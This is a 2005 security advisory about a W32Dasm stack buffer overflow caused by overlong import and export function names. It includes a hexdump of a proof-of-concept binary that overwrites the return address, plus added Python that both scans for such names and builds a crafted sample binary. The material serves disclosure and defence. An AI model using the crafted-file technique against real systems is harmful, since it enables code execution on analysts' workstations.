
| Subject: | [NT] W32Dasm Local Buffer Overflow |
|---|---|
| Date: | 25 Jan 2005 18:48:47 +0200 |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

W32Dasm Local Buffer Overflow
------------------------------------------------------------------------

SUMMARY

<http://www.expage.com/page/w32dasm> W32Dasm is "a cool and famous disassembler/debugger developed by URSoft. It has tons of functions and, also if it is no longer supported by long time, it is still widely used by a lot of people".

The program uses wsprintf() to copy the names of the imported and exported functions of the analyzed file into a stack buffer of only 256 bytes. wsprintf() takes no destination-size argument and performs no bounds check, so a function name longer than the buffer overwrites whatever follows it, including the saved return address, and lets an attacker execute arbitrary code with the privileges of the user running W32Dasm.

DETAILS

Vulnerable Systems:
 * W32Dasm version 8.93 and prior

Exploit:
Exploiting the bug is simple: take any executable and replace the name of one of its imported or exported functions with an overlong string. The overflow fires when the victim opens the file for disassembly, so the exposure is on the analyst's own workstation, typically while examining an untrusted or malicious binary, and no other interaction is needed.
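The check a practitioner would want here is one that finds such a crafted binary before a disassembler opens it. The following Python is an added example, not code from the advisory or from W32Dasm: it walks the PE import table without third-party libraries, reports any import-by-name string longer than 255 characters (the most a 256-byte buffer can hold together with its terminator), and builds an in-memory sample whose import name has the same layout as the proof-of-concept dump below (a run of 0x61 bytes followed by de c0 ad de). The 255 limit, the `build_pe` helper, the function names and the KERNEL32.dll placeholder are assumptions of the example; export names, which the advisory says are copied the same way, would need an analogous walk of the export directory.

```python
import struct
import sys

IMPORT_DIR = 1   # index of the import directory in the optional header's data directories
MAX_NAME = 255   # a 256-byte buffer holds 255 characters plus the terminating NUL


def build_pe(import_name, dll=b"KERNEL32.dll"):
    """Construct a minimal PE32 with one import-by-name entry (constructed sample, not the PoC)."""
    sec_rva, sec_raw = 0x1000, 0x200
    oft_off, ft_off, hint_off = 40, 48, 56            # offsets inside the single .idata section
    hint_name = b"\x00\x00" + import_name + b"\x00"   # IMAGE_IMPORT_BY_NAME: hint, name, NUL
    dll_off = hint_off + len(hint_name)
    body = bytearray()
    # IMAGE_IMPORT_DESCRIPTOR: OriginalFirstThunk, TimeDateStamp, ForwarderChain, Name, FirstThunk
    body += struct.pack("<5I", sec_rva + oft_off, 0, 0, sec_rva + dll_off, sec_rva + ft_off)
    body += bytes(20)                                  # all-zero descriptor terminates the table
    body += struct.pack("<2I", sec_rva + hint_off, 0)  # OriginalFirstThunk array (entry, end)
    body += struct.pack("<2I", sec_rva + hint_off, 0)  # FirstThunk array (entry, end)
    body += hint_name + dll + b"\x00"
    raw_size = (len(body) + 0x1FF) & ~0x1FF
    dos = bytearray(b"MZ") + bytes(62)
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew -> NT headers at 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)  # i386, 1 section
    opt = bytearray(224)                               # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)              # Magic: PE32
    struct.pack_into("<I", opt, 28, 0x400000)          # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)    # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x2000, 0x200)    # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMPORT_DIR, sec_rva, 40)  # import directory RVA/size
    sect = struct.pack("<8sIIIIIIHHI", b".idata", len(body), sec_rva, raw_size, sec_raw,
                       0, 0, 0, 0, 0xC0000040)
    headers = dos + b"PE\x00\x00" + file_hdr + opt + sect
    return bytes(headers + bytes(sec_raw - len(headers)) + body + bytes(raw_size - len(body)))


def _rva_to_off(sections, rva):
    for vaddr, vsize, raw, raw_size in sections:
        if vaddr <= rva < vaddr + max(vsize, raw_size):
            return rva - vaddr + raw
    raise ValueError("RVA 0x%x is not backed by any section" % rva)


def _cstr(data, off, limit=0x10000):
    end = data.index(b"\x00", off, off + limit)  # ValueError if unterminated: treat as hostile
    return data[off:end]


def import_names(pe):
    """Yield (dll, name) for every import-by-name entry of a PE32 or PE32+ file."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    nt, = struct.unpack_from("<I", pe, 0x3C)
    if pe[nt:nt + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    nsect, = struct.unpack_from("<H", pe, nt + 6)
    opt_size, = struct.unpack_from("<H", pe, nt + 20)
    opt = nt + 24
    plus = struct.unpack_from("<H", pe, opt)[0] == 0x20B     # PE32+ has a wider optional header
    ndirs, = struct.unpack_from("<I", pe, opt + (108 if plus else 92))
    if ndirs <= IMPORT_DIR:
        return
    imp_rva, _ = struct.unpack_from("<II", pe, opt + (112 if plus else 96) + 8 * IMPORT_DIR)
    if imp_rva == 0:
        return
    sections = []
    for i in range(nsect):
        vsize, vaddr, raw_size, raw = struct.unpack_from("<IIII", pe, opt + opt_size + 40 * i + 8)
        sections.append((vaddr, vsize, raw, raw_size))
    thunk_fmt, thunk_len, by_ordinal = ("<Q", 8, 1 << 63) if plus else ("<I", 4, 1 << 31)
    desc = _rva_to_off(sections, imp_rva)
    while True:
        oft, _, _, name_rva, ft = struct.unpack_from("<5I", pe, desc)
        if oft == 0 and name_rva == 0 and ft == 0:
            break
        dll = _cstr(pe, _rva_to_off(sections, name_rva))
        thunk = _rva_to_off(sections, oft or ft)
        while True:
            entry, = struct.unpack_from(thunk_fmt, pe, thunk)
            if entry == 0:
                break
            if not entry & by_ordinal:                     # by name: 2-byte hint, then the string
                yield dll, _cstr(pe, _rva_to_off(sections, entry & 0x7FFFFFFF) + 2)
            thunk += thunk_len
        desc += 20


def overlong_imports(pe, limit=MAX_NAME):
    """Return [(dll, length)] for import names that cannot fit a limit+1 byte buffer."""
    return [(dll, len(name)) for dll, name in import_names(pe) if len(name) > limit]


# Constructed sample in the layout the advisory's hexdump shows: 258 bytes of 'a' (0x61)
# followed by de c0 ad de, the little-endian encoding of the 0xdeadc0de return address.
CRAFTED = build_pe(b"a" * 258 + b"\xde\xc0\xad\xde")
BENIGN = build_pe(b"ExitProcess")

if __name__ == "__main__":
    data = CRAFTED if len(sys.argv) < 2 else open(sys.argv[1], "rb").read()
    for dll, length in overlong_imports(data):
        print("overlong import name: %d bytes, from %s" % (length, dll.decode("latin-1")))
```

Run it with a file path to scan a real binary, or with no argument to scan the constructed sample. Anything the scanner flags is not proof of an exploit attempt, since a legitimate C++ binary can carry long decorated names, but it is a file that should not be opened in an unpatched W32Dasm; the scanner also raises ValueError on an unterminated string or an RVA outside every section, both of which are common in hostile PE files and are better reported than silently skipped.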
Luigi has written a very simple proof-of-concept that overwrites the return address with 0xdeadc0de (http://aluigi.altervista.org/poc/w32dasmbof.disasm_me):

    $ hexdump w32dasmbof.disasm_me
    0000000 5a4d 0090 0003 0000 0004 0000 ffff 0000
    0000010 00b8 0000 0000 0000 0040 0000 0000 0000
    0000020 0000 0000 0000 0000 0000 0000 0000 0000
    0000030 0000 0000 0000 0000 0000 0000 0080 0000
    0000040 1f0e 0eba b400 cd09 b821 4c01 21cd 6854
    0000050 7369 7020 6f72 7267 6d61 6320 6e61 6f6e
    0000060 2074 6562 7220 6e75 6920 206e 4f44 2053
    0000070 6f6d 6564 0d2e 0a0d 0024 0000 0000 0000
    0000080 4550 0000 014c 0003 4a5d 41f5 0000 0000
    0000090 0000 0000 00e0 030f 010b 3802 0600 0000
    00000a0 0400 0000 0000 0000 1219 0000 1000 0000
    00000b0 2000 0000 0000 0040 1000 0000 0200 0000
    00000c0 0001 0000 0000 0000 0004 0000 0000 0000
    00000d0 4000 0000 0200 0000 ce24 0000 0003 0000
    00000e0 0000 0010 1000 0000 0000 0010 1000 0000
    00000f0 0000 0000 0010 0000 0000 0000 0000 0000
    0000100 3000 0000 013c 0000 0000 0000 0000 0000
    0000110 0000 0000 0000 0000 0000 0000 0000 0000
    *
    0000170 0000 0000 0000 0000 742e 7865 0074 0000
    0000180 02dc 0000 1000 0000 0400 0000 0200 0000
    0000190 0000 0000 0000 0000 0000 0000 0020 6000
    00001a0 642e 7461 0061 0000 0094 0000 2000 0000
    00001b0 0200 0000 0600 0000 0000 0000 0000 0000
    00001c0 0000 0000 0040 c000 692e 6164 6174 0000
    00001d0 013c 0000 3000 0000 0200 0000 0800 0000
    00001e0 0000 0000 0000 0000 0000 0000 0060 e000
    00001f0 0000 0000 0000 0000 0000 0000 0000 0000
    0000200 c031 8b40 244c f704 0441 0006 0000 0f74
    0000210 448b 0824 548b 1024 0289 03b8 0000 c300
    0000220 5653 8b57 2444 5010 fe6a 0068 4010 6400
    0000230 35ff 0000 0000 8964 0025 0000 8b00 2444
    0000240 8b20 0858 708b 830c fffe 2074 743b 2424
    0000250 1a74 348d 8b76 b30c 4c8b 0824 488b 830c
    0000260 b37c 0004 d775 54ff 08b3 d1eb 8f64 0005
    0000270 0000 8300 0cc4 5e5f c35b 8955 53e5 5756
    0000280 6a55 6a00 6800 1092 0040 75ff e808 020e
    0000290 0000 5f5d 5b5e ec89 c35d 55fc e589 ec83
    00002a0 5308 5756 8b55 0c5d 458b a308 208c 0040
    00002b0 1d89 2090 0040 40f7 0604 0000 0f00 bc85
    00002c0 0000 8900 f845 458b 8910 fc45 90a3 4020
    00002d0 8d00 f845 4389 8bfc 0c73 7b8b 8308 fffe
    00002e0 840f 00a8 0000 0c8d 8376 8f7c 0004 7d74
    00002f0 5556 6b8d 8b10 ec45 008b 008b 30a3 4020
    0000300 8b00 ec55 028b 34a3 4020 8b00 0442 38a3
    0000310 4020 5600 5157 14b9 0000 8d00 3c3d 4020
    0000320 8b00 3435 4020 f300 8da5 3c3d 4020 8900
    0000330 343d 4020 5900 5e5f 54ff 048f 5e5d 5d8b
    0000340 090c 74c0 7828 8b34 087b e853 ff2a ffff
    0000350 c483 8d04 106b 5356 c3e8 fffe 83ff 08c4
    0000360 0c8d 8b76 8f04 438b ff0c 8f54 8b08 087b
    0000370 0c8d 8b76 8f34 62e9 ffff 31ff ebc0 5571
    0000380 6b8d 6a10 53ff 95e8 fffe 83ff 0cc4 006a
    0000390 05c7 2010 0040 000b 0000 0b6a 2fe8 0001
    00003a0 8300 08c4 c009 2175 006a 05c7 2010 0040
    00003b0 0008 0000 086a 15e8 0001 8300 08c4 c009
    00003c0 0775 01b8 0000 eb00 8327 fff8 2a74 ff50
    00003d0 1035 4020 e800 00f6 0000 c483 ff08 1035
    00003e0 4020 e800 00dc 0000 c483 b804 0001 0000
    00003f0 5f5d 5b5e ec89 c35d 3d83 202c 0040 7500
    0000400 b807 0001 0000 e8eb 2ca1 4020 6a00 ff0b
    0000410 58e0 01b8 0000 eb00 64d7 00a1 0000 5500
    0000420 e589 ff6a 1c68 4020 6800 109a 0040 6450
    0000430 2589 0000 0000 ec83 5310 5756 6589 50e8
    0000440 3cd9 6624 0c81 0024 d903 242c c483 6a04
    0000450 6a00 6800 2028 0040 2468 4020 6800 2020
    0000460 0040 45e8 0000 ff00 2835 4020 ff00 2435
    0000470 4020 ff00 2035 4020 8900 1425 4020 e800
    0000480 0018 0000 c483 3118 89c9 fc4d e850 0026
    0000490 0000 c3c9 a364 0000 0000 00c3 c031 90c3
    00004a0 25ff 30b4 0040 9090 0000 0000 25ff 30c0
    00004b0 0040 9090 0000 0000 25ff 30c4 0040 9090
    00004c0 0000 0000 25ff 30c8 0040 9090 0000 0000
    00004d0 25ff 30cc 0040 9090 0000 0000 0000 0000
    00004e0 0000 0000 0000 0000 0000 0000 0000 0000
    *
    0000600 2000 0040 2000 0040 8000 0000 0000 0000
    0000610 0000 0000 0000 0000 0000 0000 0000 0000
    *
    0000800 3090 0000 0000 0000 0000 0000 310c 0000
    0000810 30b4 0000 309c 0000 0000 0000 0000 0000
    0000820 3120 0000 30c0 0000 0000 0000 0000 0000
    0000830 0000 0000 0000 0000 0000 0000 0000 0000
    *
    0000890 30d4 0000 0000 0000 0000 0000 30e0 0000
    00008a0 30f0 0000 30f8 0000 3100 0000 0000 0000
    00008b0 0000 0000 30d4 0000 0000 0000 0000 0000
    00008c0 30e0 0000 30f0 0000 30f8 0000 3100 0000
    00008d0 0000 0000 0278 6161 6161 6161 6161 6161
    00008e0 6161 6161 6161 6161 6161 6161 6161 6161
    *
    00009d0 6161 6161 6161 c0de dead 0000 0000 0000
    00009e0 0000 0000 0000 0000 0000 0000 0000 0000
    *
    0000a00

The overlong name is the run of 0x61 ('a') bytes starting at offset 0x8d4 inside the import data; hexdump prints little-endian 16-bit words, so the words c0de dead at offset 0x9d6 are the bytes de c0 ad de, the 0xdeadc0de value that lands on the saved return address.

ADDITIONAL INFORMATION

The information has been provided by Luigi Auriemma <mailto:aluigi@autistici.org>.
The original article can be found at: http://aluigi.altervista.org/adv/w32dasmbof-adv.txt

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

========================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.